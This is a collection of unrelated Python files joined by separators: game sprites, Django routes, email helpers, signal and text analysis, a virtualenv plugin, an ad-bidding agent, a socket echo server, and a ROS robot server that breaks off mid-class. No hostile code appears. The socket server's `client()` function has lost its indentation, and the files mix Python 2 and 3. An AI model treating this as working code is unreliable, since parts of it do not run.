class Player(GameSprite):
    """Player sprite: keyboard-driven horizontal movement plus a group
    of bullets it has fired."""

    def __init__(self, window, img_path, sprite_x, sprite_y, size_x, size_y, player_speed):
        super().__init__(window, img_path, sprite_x, sprite_y, size_x, size_y, player_speed)
        self.size_x = size_x      # kept for the right-edge clamp in update()
        self.bullets = Group()    # live bullets fired by this player

    def update(self):
        """Move left/right inside the window, then draw/update bullets."""
        keys_pressed = key.get_pressed()
        if keys_pressed[K_LEFT] and self.rect.x > 5:
            self.rect.x -= self.speed
        if keys_pressed[K_RIGHT] and self.rect.x < self.window.get_size()[0] - self.size_x:
            self.rect.x += self.speed
        # Update bullets
        self.bullets.draw(self.window)
        self.bullets.update()

    def fire(self):
        """Spawn a bullet at the ship's nose; speed -15 moves it upward."""
        bullet = Bullet(self.window, BULLET_IMG_PATH, self.rect.centerx, self.rect.top, 15, 20, -15)
        self.bullets.add(bullet)
class Bullet(GameSprite):
    """Projectile: moves by its (negative) speed each frame and removes
    itself once it leaves the top of the screen."""

    def update(self):
        self.rect.y += self.speed
        if self.rect.y < 0:
            self.kill()
|
__author__ = 'Cheng'
from django.conf.urls import patterns, url
import views
# URLconf for the pledges app. Uses the pre-Django-1.10 `patterns()`
# helper, so this file targets an old Django release.
urlpatterns = patterns('',
    # /pledges/
    url(r'^$', views.index, name='index'),
    url(r'^reward/list/$', views.list_rewards, name='list_rewards'),
    url(r'^reward/collect/$', views.collect_reward, name='collect_reward'),
    # /pledges/23
    url(r'^(?P<pledge_id>\d+)/$', views.detail, name='detail'),
    url(r'^follow/(?P<pledge_id>\d+)/$', views.follow, name='follow'),
    url(r'^finish/(?P<pledge_id>\d+)/$', views.finish, name='finish'),
    url(r'^success/(?P<pledge_id>\d+)/$', views.congrats, name='congrats'),
    url(r'^already/(?P<pledge_id>\d+)/$', views.already, name='already'),
    url(r'^share/(?P<pledge_id>\d+)/$', views.share, name='share'),
    # /pledges/23/
    url(r'^(?P<pledge_id>\d+)/results/$', views.results, name='results'),
    url(r'^create_ajax/$', views.create_ajax, name='create_ajax'),
    url(r'^paypal/$', views.get_paypal, name='paypal'),
)
|
from django.core.mail import EmailMultiAlternatives
from django.template.loader import render_to_string
def send_welcome_email(name, receiver):
    """Send the signup welcome email to `receiver`, rendering both a
    plain-text and an HTML body from the email templates.
    """
    # creating message subject and sender
    subject = "Thanks for signing up to spy on your neighbours"
    sender = 'egesacollins92@gmail.com'
    # passing in the context variables
    text_context = render_to_string('email/email.txt', {"name": name})
    html_content = render_to_string('email/email.html', {"name": name})
    # text part is the default body; HTML attached as an alternative
    msg = EmailMultiAlternatives(subject, text_context, sender, [receiver])
    msg.attach_alternative(html_content, 'text/html')
    msg.send()
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 28 11:16:56 2020
@author: voide
"""
import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
import scipy.fftpack
# Load the single-column acceleration trace from CSV.
df = pd.read_csv (r'acc_tri.csv', header=None)
acc_tri = df[0]
del df  # free the DataFrame, only the column is needed
# Analysis window: samples 2.4M–2.8M of the trace.
y = acc_tri[2400000:2800000]
y = np.asarray(y)
Fs = 40000   # sampling frequency [Hz]
T = 1 / Fs   # sampling period [s]
# FFT
N = len(y)
yf = scipy.fftpack.fft(y)
# One-sided frequency axis: 0 .. Fs/2 over N/2 bins.
xf = np.linspace(0.0, 1.0/(2.0*T), N//2)
fig = plt.figure(figsize=(30,5))
# 2/N normalizes the one-sided amplitude spectrum.
plt.plot(xf, 2.0/N * np.abs(yf[:N//2]))
plt.title('FFT')
plt.xlabel('Fréquence [Hz]')
plt.ylabel('Amplitude [-]')
# # Déterminer les 10 peak les plus importants
# freqmax_index = abs(np.argsort(-amp[:NFFT//2])[:10])
# freqmax = np.sort(freq[freqmax_index])[::-1]
|
import nltk
import random
import pickle
from nltk.tokenize import word_tokenize
# Load the raw short-review corpora (one review per line).
short_pos = open("short_reviews/positive.txt","r").read()
short_neg = open("short_reviews/negative.txt","r").read()

all_words = []
documents = []

# Keep only adjectives (POS tags starting with "J") as feature words.
allowed_word_types = ["J"]

for p in short_pos.split('\n'):
    documents.append( (p, "pos") )
    words = word_tokenize(p)
    pos = nltk.pos_tag(words)
    for w in pos:
        if w[1][0] in allowed_word_types:
            all_words.append(w[0].lower())

for p in short_neg.split('\n'):
    documents.append( (p, "neg") )
    words = word_tokenize(p)
    pos = nltk.pos_tag(words)
    for w in pos:
        if w[1][0] in allowed_word_types:
            all_words.append(w[0].lower())

# Persist the labelled documents for reuse by later training runs.
save_documents = open("pickled_algos/documents.pickle","wb")
pickle.dump(documents, save_documents)
save_documents.close()

# Top 2000 words by frequency become the feature vocabulary.
all_words = nltk.FreqDist(all_words)
word_features = list(all_words.keys())[:2000]

save_word_features = open("pickled_algos/word_features5k.pickle","wb")
pickle.dump(word_features, save_word_features)
save_word_features.close()
def find_features(document):
    """Map every vocabulary word to whether it occurs in `document`."""
    tokens = word_tokenize(document)
    return {w: (w in tokens) for w in word_features}
# Build (feature-dict, label) pairs for every document, shuffle them so
# the pos/neg ordering does not leak into train/test splits, and pickle.
featuresets = [(find_features(rev), category)
               for (rev, category) in documents]
random.shuffle(featuresets)

save_featuresets = open("pickled_algos/featuresets5k.pickle","wb")
pickle.dump(featuresets, save_featuresets)
save_featuresets.close()
print(len(featuresets))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: anchen
# @Date: 2017-07-03 23:24:13
# @Last Modified by: anchen
# @Last Modified time: 2017-08-12 12:52:22
from flask import current_app, render_template
from flask_mail import Message
from . import mail, celery, create_app
# Start the message worker from the directory containing manager.py:
#   celery -A manager.celery worker --loglevel=info
@celery.task(serializer='pickle')
def send_async_email(msg):
    """Celery task: send a prebuilt flask_mail Message inside a fresh
    app context (pickle serializer lets the Message object cross the
    broker)."""
    app = create_app('default' or 'development')
    with app.app_context():
        mail.send(msg)
def send_mail(to, subject, template, **kwargs):
    """Render `template` (.txt and .html variants) with `kwargs` and
    queue it for async delivery via the Celery task above.
    """
    # If send_async_email.delay() complains that the Message object is
    # not JSON-serializable, there are a few workarounds:
    # 1. Pass a plain dict of message details and build the Message
    #    inside the task:
    #    @celery.task
    #    def send_async_email(message_details):
    #        with app.app_context():
    #            msg = Message(message_details['subject'],
    #                          message_details['recipients'])
    #            msg.body = message_details['body']
    #            mail.send(msg)
    # 2. Allow pickle content and use a pickle-serialized task:
    #    app.config.update(accept_content=['json','pickle'])
    #    @celery.task(serializer='pickle')
    #    def send_async_email(msg): ...
    # 3. Pin Flask-Mail:
    #    pip uninstall Flask-Mail && pip install Flask-Mail==0.9.0
    app = current_app._get_current_object()
    msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject, sender=app.config['FLASKY_MAIL_SENDER'],
                  recipients=[to])
    msg.body = render_template(template + '.txt', **kwargs)
    msg.html = render_template(template + '.html', **kwargs)
    send_async_email.delay(msg)
    # Sending with a plain Thread instead of Celery gives low concurrency:
    # thr = Thread(target=send_async_email,args=(app,msg))
    # thr.start()
|
######################################################
# this functions only purpose is to ask for and
# recieve user input
#####################################################
def user_input():
    """Prompt the user and return the raw word or sentence entered."""
    words = input("please enter a word or sentence :")
    return words
######################################################
# Split the input into words and pig-latin each one,
# accumulating the translated sentence.
#####################################################
def word_editor(words):
    """Return the sentence with every word converted via pig_latinor.

    The result keeps the original's leading-space convention.
    """
    sentence = " "
    for token in words.rsplit(" "):
        sentence += pig_latinor(token)
    return sentence
######################################################
# Convert one word to this script's pig-latin form.
#####################################################
def pig_latinor(word):
    """Return the pig-latin form of `word`, with a trailing space.

    Numbers pass through unchanged; words keep a leading consonant
    digraph (e.g. "th", "sr") together for pronunciation.
    """
    vowels = ["a", "e", "i", "o", "u", "y"]
    if word.isdigit():
        # pure numbers are not translated
        return word + " "
    if len(word) > 1:
        if word[0] not in vowels and word[1] not in vowels:
            # two leading consonants move together
            prefix, rest = word[:2], word[2:]
        else:
            prefix, rest = word[0], word[1:]
        return rest + " " + prefix + "ay "
    # single-letter word just gets the suffix
    return word + "ay "
###############################################################
# this functions cleans up the displays the newly made sentence
###############################################################
def display(sentence):
    """Strip surrounding whitespace from the finished sentence and print it.

    Bug fix: the original called ``sentence.strip()`` but discarded the
    result (strings are immutable), so the sentence was printed with its
    leading/trailing spaces intact.
    """
    print(sentence.strip())
########################################################
# this is where it is all controlled
########################################################
# --- script entry point: read a sentence, convert it, display it ---
users_sentence = user_input()
piglatin_sentence = word_editor(users_sentence)
display(piglatin_sentence)
"""
Plugin that allows you to manage a python virtual env
## Requirements
- `pipenv`
- `pipenv-setup` if you want to run the `sync_setup` operation
"""
import argparse
import os
import confu.schema
import ctl
import ctl.config
from ctl.auth import expose
from ctl.docs import pymdgen_confu_types
from ctl.exceptions import UsageError
from ctl.plugins import command
# `pipenv-setup` is an optional dependency: when it is missing, the
# `sync_setup` operation raises a UsageError instead of failing at import.
try:
    import pipenv_setup
except ImportError:
    pipenv_setup = None
@pymdgen_confu_types()
class VenvPluginConfig(confu.schema.Schema):
    """
    Configuration schema for `VenvPlugin`
    """
    # python interpreter version the virtualenv should be built with
    python_version = confu.schema.Str(choices=["2.7", "3.4", "3.5", "3.6", "3.7"])
    # Pipfile used by the `sync` operation; templated against the ctl context
    pipfile = confu.schema.Str(help="path to Pipfile", default="{{ctx.home}}/Pipfile")
@ctl.plugin.register("venv")
class VenvPlugin(command.CommandPlugin):
    """
    manage a virtual python environment

    # Instanced Attributes

    - binpath (`str`): path to the plugin's helper-script `bin/` directory
    """

    class ConfigSchema(ctl.plugins.PluginBase.ConfigSchema):
        config = VenvPluginConfig()

    description = "manage a virtualenv using venv"

    @classmethod
    def add_arguments(cls, parser, plugin_config, confu_cli_args):
        """
        Attach the `build`, `sync`, `copy` and `sync_setup` operation
        sub-parsers to the plugin's argument parser.
        """
        # shared parser so `build` and `sync` accept the same
        # optional `output` positional
        install_parser = argparse.ArgumentParser(add_help=False)
        group = install_parser.add_mutually_exclusive_group(required=False)
        group.add_argument("output", nargs="?", type=str, help="venv location")

        # subparser that routes operation
        sub = parser.add_subparsers(title="Operation", dest="op")

        sub.add_parser("build", help="build virtualenv", parents=[install_parser])

        sub.add_parser(
            "sync",
            help="sync virtualenv using pipenv, "
            "will build venv first if it does not exist",
            parents=[install_parser],
        )

        op_copy_parser = sub.add_parser("copy", help="copy virtualenv")
        op_copy_parser.add_argument(
            "source", nargs="?", type=str, help="venv source location"
        )
        op_copy_parser.add_argument(
            "output", nargs="?", type=str, help="venv output location"
        )

        op_sync_setup_parser = sub.add_parser(
            "sync_setup", help="sync setup.py from Pipfile"
        )
        op_sync_setup_parser.add_argument(
            "setup_file",
            nargs="?",
            default=".",
            type=str,
            help="location of the setup.py file you want to sync",
        )
        op_sync_setup_parser.add_argument(
            "--freeze",
            action="store_true",
            help="Do a frozen sync with pinned versions from Pipfile.lock",
        )
        op_sync_setup_parser.add_argument(
            "--dry", action="store_true", help="Do a dry run"
        )

    def venv_exists(self, path=None):
        """
        Does a valid virtual environment exist at location?

        If no location is supplied the path in `self.output` is checked

        **Keyword Arguments**

        - path (`str`): path to check (should be virtualenv root directory)

        **Returns**

        `True` if venv exists, `False` if not
        """
        # presence of `bin/activate` is used as the marker of a valid venv
        return os.path.exists(os.path.join(path or self.output, "bin", "activate"))

    def venv_validate(self, path=None):
        """
        Validate virtualenv at location

        If no location is supplied the path in `self.output` is checked

        Will raise a `UsageError` on validation failure

        **Keyword Arguments**

        - path (`str`): path to check (should be virtualenv root directory)
        """
        if not self.venv_exists(path):
            raise UsageError(f"No virtualenv found at {path or self.output}")

    def execute(self, **kwargs):
        """
        Resolve config and command-line arguments, then dispatch to the
        requested operation (`build`, `sync`, `copy` or `sync_setup`).
        """
        self.kwargs = kwargs

        python_version = self.get_config("python_version")
        pipfile = self.get_config("pipfile")
        self.python_version = self.render_tmpl(python_version)
        self.pipfile = self.render_tmpl(pipfile)

        output = self.get_config("output") or ""
        self.log.info(f"Pipfile: {self.pipfile}")
        self.output = os.path.abspath(self.render_tmpl(output))

        # the ctl_venv_* helper scripts live next to this package in bin/
        self.binpath = os.path.join(os.path.dirname(__file__), "..", "bin")

        self.prepare()
        self.shell = True

        op = self.get_op(kwargs.get("op"))
        op(**kwargs)

    @expose("ctl.{plugin_name}.build")
    def build(self, **kwargs):
        """
        build a fresh virtualenv
        """
        command = [f"ctl_venv_build {self.output} {self.python_version}"]
        self._run_commands(command, **kwargs)

    @expose("ctl.{plugin_name}.sync")
    def sync(self, **kwargs):
        """
        sync a virtualenv using pipenv

        will build a fresh virtualenv if it doesnt exist yet
        """
        if not self.venv_exists():
            self.build(**kwargs)
        command = [f"ctl_venv_sync {self.output} {self.pipfile}"]
        self._run_commands(command, **kwargs)

    @expose("ctl.{plugin_name}.copy")
    def copy(self, source, **kwargs):
        """
        copy virtualenv to new location

        **Arguments**

        - source (`str`): path of the venv to copy (validated first)
        """
        source = os.path.abspath(self.render_tmpl(source))
        self.venv_validate(source)
        command = [f"ctl_venv_copy {source} {self.output}"]
        self._run_commands(command, **kwargs)

    @expose("ctl.{plugin_name}.sync_setup")
    def sync_setup(self, setup_file=".", dry=False, freeze=False, dev=True, **kwargs):
        """
        Syncs setup.py requirements from Pipfile

        **Keyword Arguments**

        - setup_file (`str`): path to `setup.py` file. If not specified
          will check in `.` instead
        - dry (`bool`=`False`): if `True` do a dry run and report what
          updates would be done to `setup.py`
        - freeze (`bool`=`False`): if `True` do frozen pinned versions
          from Pipfile.lock
        - dev (`bool`=`True`): Also fill extras_require with Pipfile dev
          entries
        """
        if not pipenv_setup:
            raise UsageError(
                "Please install `pipenv-setup` to be able to use this command"
            )

        if dry:
            sub_command = "check"
        else:
            sub_command = "sync"

        with self.cwd_ctx(os.path.dirname(setup_file) or "."):
            # Bug fix: `--dev` was previously hard-coded into the base
            # command AND appended again below, so `dev=False` still synced
            # dev entries and `dev=True` passed the flag twice. The flag is
            # now appended only when requested.
            command = f"pipenv-setup {sub_command}"
            if dev:
                command = f"{command} --dev"
            if not freeze:
                command = f"{command} --pipfile"
            self._run_commands([command], **kwargs)
|
from ete3 import Tree

# Newick tree (format=1 keeps internal node names) rendered as ASCII art.
tree = Tree("((((G:9)E:5)C:7)B:7,(F:6)D:5)A;", format=1)
print(tree.get_ascii(show_internal=True))
|
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 22 00:12:36 2017
@author: Eyal
"""
from CampaignClass import Campaign
from UcsManagerClass import ucsManager
import itertools
import math
def eprint(*args, **kwargs):
    """Append a log line to the per-simulation log file instead of stdout.

    The target file is selected by ``Agent.simId`` (resolved at call time,
    so the class defined below is available by then).
    """
    log_path = "../myLogs/sim{0}/PinePyEngine_Sim{0}.log".format(Agent.simId)
    with open(log_path, "a+") as log_file:
        print(*args, file=log_file, **kwargs)
class Agent:
    """An ad-bidding agent that tracks its campaigns and forms daily bid
    bundles.

    NOTE(review): appears to model an AdX/TAC-style ad-exchange game agent
    (campaigns, UCS levels, impression bids) -- confirm against the game
    spec this was written for.
    """
    # shared simulation id; also selects the log file used by eprint()
    simId = 0
    def __init__(self, name):
        self.name = name
        self.quality = 1.0 #starting quality is 1.0
        ''' powers of 0.9 '''
        self.dailyUCSLevel = 0.9 #starting UCS Level is 0.9
        ''' list of CIDs'''
        self.my_cids = []
    def __repr__(self):
        return "Agent {}: Q: {} Campaigns: {}".format(self.name, self.quality, self.my_campaigns())
    def my_campaigns(self):
        # resolve this agent's campaign ids against the global campaign registry
        return [Campaign.campaigns[cid] for cid in self.my_cids]
    def getOnGoingCampaigns(self, day):
        # campaigns of this agent that are active on the given day
        return [camp for camp in self.my_campaigns() if camp.activeAtDay(day)]
    def campaignOpportunityBid(self, campaign): # as defined in the document
        # clamp the initial budget bid into the valid interval
        # (reach/(10*quality), reach*quality), stepping 5 inside the bound
        # when the raw bid falls outside it
        COB = campaign.initial_budget_bid()
        if (COB < campaign.reach*self.quality) and (COB > campaign.reach/(10*self.quality)): #inside interval
            return COB
        elif COB >= campaign.reach*self.quality: #greater than maximum
            return (campaign.reach*self.quality) - 5
        else: #lower than minimum
            return campaign.reach/(10*self.quality) + 5
    def formBidBundle(self, day):
        '''
        forms a bid bundle for tomorrow

        param day is (current game day + 1)

        Returns a list of bid dicts (query / bid / campaignId / weight /
        dailyLimit), one entry per (segment-or-Unknown, adType, device)
        combination for every campaign active tomorrow.
        '''
        bidsArray = []
        ongoing_camps = self.getOnGoingCampaigns(day)
        eprint("#formBidBundle: {}: tomorrow is {}, ongoing camps tomorrow are {}".format(self.name, day, [cmp.cid for cmp in ongoing_camps]))
        ucs_level = ucsManager.get_desired_UCS_level(day, ongoing_camps) #day is tomorrow as this function expects
        # NOTE(review): the level is decremented before the accuracy lookup --
        # presumably to convert to a 0-based index; confirm against ucsManager
        if ucs_level > 0:
            ucs_level -= 1
        lvl_accuracy = ucsManager.level_accuracy(ucs_level)
        for cmp in ongoing_camps:
            cid = cmp.cid
            eprint("#formBidBundle: forming bids for cid {}".format(cid))
            cmpSegmentsSize = cmp.sizeOfSegments()
            # impressions still wanted tomorrow, discounted by UCS accuracy,
            # capped by segment size and floored at 0
            goal_targeted_number_of_imps_for_day = max(min(cmpSegmentsSize*lvl_accuracy, (cmp.impressions_goal - cmp.targetedImpressions)*lvl_accuracy) ,0)
            if goal_targeted_number_of_imps_for_day < 1:
                continue
            eprint("#formBidBundle: cid:{} goal_targeted_number_of_imps_for_day is {}, impressionsGoal = {}, targetedImps = {}, level_accuracy = {}".format(
                    cid, goal_targeted_number_of_imps_for_day, cmp.impressions_goal, cmp.targetedImpressions, lvl_accuracy))
            # sort segments of campaign based on segment demand
            # cmpSegmentsList = sorted(cmp.segments, key = lambda x: x.segment_demand(day, Campaign.getCampaignList()))
            # NOTE(review): sorts the campaign's segment list in place --
            # this mutates shared Campaign state
            cmp.segments.sort(key = lambda x: x.segment_demand(day, Campaign.getCampaignList()))
            cmpSegmentsList = cmp.segments
            eprint("#formBidBundle: sorted campaigns for cid={} are {}".format(cid, cmpSegmentsList))
            # take the cheapest-demand prefix of segments whose accumulated
            # (size * accuracy) covers the day's impression goal
            bidSegments = []
            for i in range(len(cmpSegmentsList)):
                if sum(seg.size for seg in cmpSegmentsList[:i]) * lvl_accuracy > goal_targeted_number_of_imps_for_day:
                    bidSegments = cmpSegmentsList[:i]
                    break
            if not bidSegments:
                bidSegments = cmpSegmentsList
            eprint("#formBidBundle: for cid={} the bid segments are {}".format(cid ,bidSegments))
            def mean(numbers):
                # average with a guard against empty input
                return float(sum(numbers)) / max(len(numbers), 1)
            avgDem = mean([seg.segment_demand(day, Campaign.getCampaignList()) for seg in bidSegments])
            eprint("#formBidBundle: demands for segments are: {}".format([seg.segment_demand(day, Campaign.getCampaignList()) for seg in bidSegments]))
            if any(seg.segment_demand(day, Campaign.getCampaignList()) != avgDem for seg in bidSegments):
                eprint("#formBidBundle: demand varies!")
            NORMALING_FACTOR = 38.0 #TODO: think what that should be
            # raise bids as the campaign nears its end day
            PANIC_FACTOR = 1.0
            # if cmp.startDay == 1:
            #     PANIC_FACTOR *= 1.5
            if cmp.endDay == day-1:
                PANIC_FACTOR = 1.15
            elif cmp.endDay == day:
                PANIC_FACTOR = 1.4
            # boost output when the remaining per-day need exceeds the
            # original per-day average
            outputCoeff = 1
            dailyImpsAvg = cmp.impressions_goal / cmp.activePeriodLength()
            dailyImpsAvgTogo = max((cmp.impressions_goal - cmp.targetedImpressions),0) / (cmp.endDay - day + 1)
            if dailyImpsAvgTogo > dailyImpsAvg:
                outputCoeff = dailyImpsAvgTogo / dailyImpsAvg
            p = cmp.avg_p_per_imp
            eprint("#formBidBundle: for camp {} the p is {} and avgDem is {}".format(cmp.cid, p, avgDem))
            # one bid per (segment or Unknown) x adType x device combination
            for x in itertools.product(bidSegments + [None], ["Text","Video"], ["Desktop", "Mobile"]):
                seg = x[0]
                coeffsMult = 1
                if x[1] == "Video" and cmp.videoCoeff > 1:
                    coeffsMult *= cmp.videoCoeff
                if x[2] == "Mobile" and cmp.mobileCoeff > 1:
                    coeffsMult *= cmp.mobileCoeff
                if seg == None: #empty query (UNKNOWN)
                    #bid = p * coeffsMult
                    bid = 0.005
                    #this stands for the impressions we don't expect to catch because of lack of ucs
                    s = max(min(cmpSegmentsSize, (cmp.impressions_goal - cmp.targetedImpressions)) - goal_targeted_number_of_imps_for_day,0)
                    query = {
                            "marketSegments" : [{"segmentName":"Unknown"}],
                            "Device" : x[2],
                            "adType" : x[1]
                            }
                else: #normal query
                    # scale price by relative demand, panic and output factors
                    demand = seg.segment_demand(day, Campaign.getCampaignList())
                    #eprint("#formBidBundle: for segment {}, (demand - avgDem) is {}".format(seg, demand - avgDem))
                    bid = float(max((p * (demand / avgDem) * NORMALING_FACTOR) * coeffsMult * PANIC_FACTOR * outputCoeff , 0))
                    # if bid < 0:
                    #     eprint("formBidBundle: warning (demand - avgDem) turned the bid to negative. fixed it somehow")
                    #     bid = p * PANIC_FACTOR * outputCoeff
                    # the last (most expensive) segment only gets the leftover
                    # impressions needed to reach the day's goal
                    if (not seg is bidSegments[-1]):
                        s = seg.size
                    else:
                        s = max(goal_targeted_number_of_imps_for_day - sum(segTag.size for segTag in bidSegments[:-1]), 0)
                    query = {
                            "marketSegments" : [{"segmentName":seg.name}],
                            "Device" : x[2],
                            "adType" : x[1]
                            }
                bidsArray += [{"query" : query,
                               "bid" : str(bid),
                               "campaignId" : int(cid),
                               #"weight" :1 ,
                               "weight" : int(math.sqrt(cmp.imps_to_go()) if cmp.imps_to_go() > 0 else 0),
                               "dailyLimit" : str(float(bid*s*lvl_accuracy))}]
        eprint("#formBidBundle: out of this func")
        return bidsArray
import os
import socket
import threading
import SocketServer
SERVER_HOST = '127.0.0.1'
SERVER_PORT = 0 #random port
BUF_SIZE = 1024
ECHO_MSG = 'Hello Server!'
class ThreadedServerRequestHandler(SocketServer.BaseRequestHandler):
    # Handles one client connection; ThreadingMixIn runs each handler
    # on its own thread.
    def handle(self):
        # echo the received payload back, prefixed with the handler thread name
        data = self.request.recv(BUF_SIZE)
        currentThread = threading.current_thread()
        response = '%s: %s' % (currentThread.name, data)
        #print response
        self.request.send(response)
# TCP server that spawns a new thread per incoming connection
class ThreadedServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
    pass
def client(ip, port, message):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
try:
sock.sendall(message)
response = sock.recv(BUF_SIZE)
print 'Client received:', response
except Exception as e:
pass
finally:
sock.close()
if __name__ == '__main__':
    # SERVER_PORT == 0 lets the OS pick a free port; read the actual
    # address back from the server
    server = ThreadedServer((SERVER_HOST, SERVER_PORT), ThreadedServerRequestHandler)
    ip, port = server.server_address
    # serve in a daemon thread so the process can exit after the clients run
    serverThread = threading.Thread(target=server.serve_forever)
    serverThread.setDaemon(True)
    serverThread.start()
    print 'Server thread name:', serverThread.name
    client(ip, port, 'I\'m client1')
    client(ip, port, 'I\'m client2')
    client(ip, port, 'I\'m client3')
    server.shutdown()
|
#import odd_cluster, frequent_values, duplicate_months
#import diurnal_cycle, distributional_gap, records, streaks
#import spike, climatological, humidity, clouds, variance
#import clean_up, winds
|
'''
Created on Jan 9, 2015
@author: niuzhaojie
'''
from Task import Task
class ComputeTask(Task):
    """A task whose remaining work is measured as execution time.

    The workload starts at ``execTime`` and is consumed by successive
    calls to :meth:`schedule`, never dropping below zero.
    """
    def __init__(self, taskID, priority, resource, execTime):
        """Create a compute task with the given id, priority, resource
        and total execution time."""
        super(ComputeTask, self).__init__(taskID, priority, resource)
        self._execTime = execTime
        self._workload = execTime
    def getWorkload(self):
        """Return the remaining (unscheduled) workload."""
        return self._workload
    def schedule(self, t):
        """Consume up to ``t`` time units of the remaining workload."""
        remaining = self._workload - t
        self._workload = remaining if remaining > 0 else 0
|
class Solution:
    def containsDuplicate(self, nums: List[int]) -> bool:
        """Return True if any value appears at least twice in nums.

        Improvement over the original: instead of building a full
        frequency dict and then scanning it, track seen values in a set
        and return as soon as the first duplicate is found — still O(n)
        time / O(n) space, but with early exit and one pass.
        """
        seen = set()
        for num in nums:
            if num in seen:
                return True
            seen.add(num)
        return False
# NOTE(review): looks like an auto-generated interop stub (.NET-style
# names, pass-body method) -- confirm its generator before hand-editing.
class dotAreaPolygons_t(object):
    # no doc
    def ToStruct(self,PartIds):
        """ ToStruct(self: dotAreaPolygons_t,PartIds: ArrayList) """
        pass
    # stub attributes; presumably populated by the interop layer at runtime
    aIdList=None
    ClientID=None
    nAreas=None
    nIdList=None
|
import pandas as pd
import statsmodels.formula.api as sm
import statsmodels.api as sma
from pathlib import Path
file = open('forward_output2.txt','w')
def forward_selected(data, response, remaining, prev=[]):
    """
    Forward model selection using the ANOVA F-test p-value (threshold 0.05).

    based upon algorithm found at: https://planspace.org/20150423-forward_selection_with_statsmodels/

    Fitted models are cached as pickles under models/ keyed by their
    formula, so reruns reuse previous fits.

    Parameters:
        data: pandas DataFrame with the response and candidate columns.
        response: name of the response column.
        remaining: candidate predictor names.
            NOTE(review): mutated in place -- chosen predictors are removed.
        prev: predictors forced into every model.
            NOTE(review): mutable default argument, shared across calls.

    Returns:
        (fitted OLS model, formula string, list of selected predictors)
    """
    selected = []
    prv = []
    current_score, best_new_score = 0.05, 0.05
    best_formula = ''
    starting_formula = "{response} ~ {prev}{selected}"
    # join forced-in predictor groups into a single "+"-separated prefix
    for i in range(0,len(prev)):
        prv.append("+".join(prev[i]))
    if len(prv) > 0:
        previous = "+".join(prv)
    else:
        previous = '1'
    # loop while the last round accepted a candidate (scores stay equal)
    while remaining and current_score == best_new_score:
        current_score = 0.05
        scores_with_candidates = []
        # base model: everything selected so far
        sel = starting_formula.format(response=response, selected='+'.join(selected), prev=previous)
        s_file = "models/"+sel.replace(response+" ~ ","")+'.pickle'
        s_file = s_file.replace('+', '')
        if Path(s_file).exists():
            sel_model = sma.load(s_file)
        else:
            # NOTE(review): best_model is only bound after the first scoring
            # pass; this branch relies on sel != best_formula ('' initially)
            if sel == best_formula:
                sel_model = best_model
            else:
                sel_model = sm.ols(sel, data).fit()
                sel_model.save(s_file)
        print("testing base: {}".format(sel), file = file)
        print("testing base: {}".format(sel))
        # normalize the prefix so candidate formulas concatenate cleanly
        if previous == "1" or previous == "":
            previous = ""
        else:
            if previous[:1] != "+":
                previous = previous+"+"
        # score every remaining candidate added to the base model
        for candidate in remaining:
            formula = starting_formula.format(response=response, selected='+'.join(selected + [candidate]), prev=previous)
            f_file = "models/"+formula.replace(response+" ~ ","")+'.pickle'
            f_file = f_file.replace('+','')
            if Path(f_file).exists():
                model = sma.load(f_file)
            else:
                model = sm.ols(formula, data).fit()
                model.save(f_file)
            print("testing addition: {}".format(formula), file = file)
            print("testing addition: {}".format(formula))
            # p-value of the F-test comparing base vs base+candidate
            prf = sma.stats.anova_lm(sel_model,model)['Pr(>F)'].loc[1]
            print("testing addition: {} result: {}".format(formula, prf), file = file)
            print("testing addition: {} result: {}".format(formula, prf))
            scores_with_candidates.append((prf, candidate, model, formula))
        # smallest p-value wins this round
        scores_with_candidates.sort()
        best_new_score, best_candidate, best_model, best_formula = scores_with_candidates.pop(0)
        if best_new_score < current_score:
            remaining.remove(best_candidate)
            selected.append(best_candidate)
            current_score = best_new_score
    # strip the trailing "+" when nothing beyond the prefix was selected
    if previous[:1] != "+" and len(selected) == 0:
        previous = previous[:-1]
    formula = starting_formula.format(response=response, selected='+'.join(selected), prev=previous)
    model = sm.ols(formula, data).fit()
    model.save('best_model2.pickle')
    return model, formula, selected
# --- script driver: load data, run forward selection, report to file & stdout ---
d = pd.read_csv("cleaned.csv")
# treat release month/year as categorical, not numeric
d['ReleaseMonth'] = d['ReleaseMonth'].astype('str')
d['ReleaseYear'] = d['ReleaseYear'].astype('str')
result, f, selected = forward_selected(d,'ReservesLevel',['Channel','Platform','ReleaseYear','ReleaseMonth','RelativeWeek','GameType'])
print(f, file = file)
print(selected, file = file)
print(result.summary(), file = file)
print(f)
print(selected)
print(result.summary())
file.flush()
file.close()
|
#!/usr/bin/python
import yaml
from os import path
import rospy
import actionlib
import rosparam
# Actionlib messages
import lasr_pnp_bridge.msg as lpb_msg
from std_msgs.msg import String, Header
from sensor_msgs.msg import Image, PointCloud2
from actionlib_msgs.msg import GoalStatus
from geometry_msgs.msg import Point, Quaternion, Pose
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
from play_motion_msgs.msg import PlayMotionAction, PlayMotionGoal
from lasr_img_depth_mask.msg import DepthMaskAction, DepthMaskGoal
from lasr_object_detection_yolo.msg import yolo_detectionAction, yolo_detectionGoal
from pal_interaction_msgs.msg import TtsGoal, TtsAction
from collections import defaultdict
import cv2
from cv_bridge import CvBridge, CvBridgeError
class P1Server(object):
    """Actionlib bridge server for the 'P1' restaurant-table demo.

    Receives Bridge goals whose `action` names one of this class's
    methods (gotoHome, goto, countPeople, identifyStatus, count, ...)
    and dispatches to it, driving move_base / play_motion / depth mask /
    YOLO detection / TTS action clients on a TIAGo-style robot.
    """
    _feedback = lpb_msg.BridgeFeedback()
    _result = lpb_msg.BridgeResult()
    def __init__(self, server_name):
        """Start the bridge action server and connect all action clients."""
        # bridge server
        self._bridge_server = actionlib.SimpleActionServer(server_name, lpb_msg.BridgeAction, execute_cb=self.execute_cb, auto_start=False)
        self._bridge_server.start()
        # Initialising clients: move_base, playmotion, objectRecognition and table_status
        self.move_base_client = actionlib.SimpleActionClient('/move_base', MoveBaseAction)
        self.play_motion_client = actionlib.SimpleActionClient('/play_motion', PlayMotionAction)
        self.depth_mask_client = actionlib.SimpleActionClient('/depth_mask', DepthMaskAction)
